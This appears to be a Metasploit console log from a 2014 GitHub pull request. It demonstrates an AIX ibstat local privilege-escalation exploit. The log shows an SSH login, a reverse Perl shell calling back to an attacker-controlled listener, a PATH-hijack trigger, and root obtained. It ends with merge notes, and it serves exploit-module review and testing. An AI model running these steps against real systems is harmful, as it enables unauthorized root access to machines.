msf auxiliary(ssh_login) > set RHOSTS [redacted]
RHOSTS => [redacted]
msf auxiliary(ssh_login) > set USERNAME [redacted]
USERNAME => [redacted]
msf auxiliary(ssh_login) > set PASSWORD [redacted]
PASSWORD => [redacted]
msf auxiliary(ssh_login) > run

[*] [redacted]:22 SSH - Starting bruteforce
[*] [redacted]:22 SSH - [1/1] - Trying: username: '[redacted]' with password: '[redacted]'
[*] Command shell session 1 opened ([redacted]:47387 -> [redacted]:22) at 2014-03-27 16:15:40 -0500
[+] [redacted]:22 SSH - [1/1] - Success: '[redacted]':'[redacted]' 'uid=20013521([redacted]) gid=1(staff) AIX l273pp056_pub 1 7 00F602734C00 '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > use exploit/aix/local/ibstat_path
msf exploit(ibstat_path) > set SESSION 1
SESSION => 1
msf exploit(ibstat_path) > set PAYLOAD cmd/unix/reverse_perl
PAYLOAD => cmd/unix/reverse_perl
msf exploit(ibstat_path) > set LHOST [redacted]
LHOST => [redacted]
msf exploit(ibstat_path) > exploit

[*] Started reverse handler on [redacted]:4444
[+] Target is vulnerable.
[*] Checking if gcc exists...
[*] gcc not found. Using /bin/sh from local system
[*] Writing custom arp file...
[*] Custom arp file written
[*] Updating $PATH environment variable...
[*] Triggering vulnerablity...
[*] Restoring $PATH environment variable...
[*] Checking root privileges...
[+] Got root! (euid)
[*] Executing payload...
[*] Command shell session 2 opened ([redacted]:4444 -> [redacted]:49066) at 2014-03-27 16:55:23 -0500
[+] Deleted /tmp/arp

4168838728
zPtIPyitHSaNrodrCcKIcmNnSQWACFAM
gRZjBzhdwkFsBsOAtvOHuQkKZyhdSWtB
id
uid=20013521([redacted]) gid=1(staff) euid=0(root)
uname -a
AIX l273pp056_pub 1 7 00F602734C00
@wvu-r7 wvu-r7 added a commit that referenced this pull request Apr 3, 2014
@wvu-r7 wvu-r7 Land #3046, AIX ibstat privesc exploit 48ef061
@wvu-r7 wvu-r7 merged commit 8611526 into rapid7:master Apr 3, 2014

1 check passed: the Travis CI build passed.